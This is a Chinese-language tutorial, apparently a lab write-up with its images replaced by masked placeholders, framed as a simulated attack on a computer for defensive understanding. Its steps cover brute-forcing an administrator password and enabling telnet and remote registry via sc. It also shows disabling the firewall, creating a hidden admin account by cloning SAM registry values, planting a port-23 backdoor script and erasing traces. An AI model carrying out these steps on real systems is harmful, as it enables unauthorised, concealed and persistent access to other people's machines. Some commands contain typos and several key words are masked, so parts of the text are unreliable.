实验名称:模拟******计算机<?xml:namespace prefix = o ns = "urn:schemas-microsoft-com:office:office" />

实验需求描述 :通过模拟***实验明白******原理,做好防范。

试验步骤:

一:扫描目标计算机

使用扫描软件扫描目标计算机,确定开放的端口,判断操作系统的类型。

扫描软件推荐使用X-ScanSuperScan,Nmap和流光

在这里使用X-Scan
模拟******

模拟******

二:获得管理权限

根据扫描结果,尝试暴力**管理员账户的密码。X-Scan,流光,LC5等软件都提供了暴力**功能,**后会自动生成报告

模拟******
模拟******
模拟******
三:***目标计算机(必须知道了**了密码,否则一切免谈

1.         使用管理员的账户建立IPC链接,命令为“net use \\对方IP 密码 /user:administrator

模拟******
模拟******
1.     使用sc命令目标计算机的所有服务列表,并保存到本地,命令为“sc \对方IP query type= service state= all >c:\yue.txt
模拟******

     c盘,打开yue.txt文件,找到telnet,确认telnet的服务状态(默认为禁用状态)

模拟******

模拟******

如果知道telnet的服务名称,可以直接使用命令行查看,命令为“sc \\IP qc tlntsvr

模拟******

去除telnet服务的禁用状态,设置为自动运行,命令为“sc \\IP config tlntsvr start= auto.
模拟******

1.     然后启用telnet服务,命令为“sc \\IP start tlntsvr.

模拟******

停用目标计算机的windows防火墙,命令为“sc \\IP stop sharedaccess.

模拟******

   确认目标计算机启用了远程注册表服务,命令为“sc \\IP qc romoteregistry如果该服务为停用状态,则启用。

四:添加隐藏用户

 1.建立telnet连接,管理目标计算机,命令为“telnet IP连接成功后输入管理员的账户和密码

模拟******
模拟******
模拟******
通过telnet,在目标计算机上建立隐藏账户,命令为“net user 名字$ 密码/add.
模拟******

在本地运行“RegEdit”,在注册表编辑器中选择“文件-连接网络注册表”在选择计算机的窗口中输入目标计算机的地址,并提供目标计算机的用户名和密码。

模拟******

模拟******

模拟******

模拟******

模拟******

打开目标计算机的注册表,右击“HKEY_LOCAL_MACHINE项下的“SAM项下的“SAM”选择“权限”
模拟******

SAN权限窗口中,赋予管理员完全控制权限,断开与目标计算机的连接,然后重新建立连接。

模拟******

展开目标计算机的

HKEY_LOCAL_MACHINE\SAM\SAM\Domains\User\Name”项,找到“administrator”和新建的用户“yezi$,记录他们的类型。
模拟******
展开目标计算机

HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users”项下后三位1F4的子项,该项和administrator相对应

模拟******
双击右侧窗格1F4下的F键值,复制F值下的全部数据
模拟******

展开目标计算机

HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users”项下后三位3EE的子项,使用从1F4项复制的数据覆盖3EEF键值的数据

模拟******
导出目标计算机注册表的yezi$项和000003EE项保存到本地,并命名一下,后缀是.reg格式。
模拟******

模拟******

模拟******

模拟******

模拟******

返回到telnet命令行,删除目标计算机的账户yezi$,命令为“net user yezi$/delete.
模拟******

在目标计算机上导入yezi1.regyezi.reg.命令为“reg import yezi1.regreg import yezi2.reg.完成本步后将真正的在目标计算机上建立一个隐藏用户。使用命令行或图形工具都不能查看到,但在注册表中可以看见。
模拟******

模拟******

删除目前和目标计算机的IPC连接,命令为“net user \\对方IP delete.
模拟******

打开目标计算机的注册表,右击

HKEY_LOCAL_MACHINE\SAM\SAM选择“权限”取出管理员的读取和完全控制权限,恢复到默认状态。

五:保留管理后门,隐藏***痕迹。

在本地建立一个名为open23.bat的脚本文件,内容

如下;将其拷贝到“\\目标IP\C$下。

模拟******
模拟******
建立telnet连接,进入目标计算机的C盘运行open23.bat脚本。运行成功后重新启动windows防火墙,并且开启TCPUDP23端口以允许telnet连接通过防火墙,

最后,删除目标计算机上的遗留文件,如;open23.bat.从此以后,可以在目标计算机上来去自如,跟主人一样。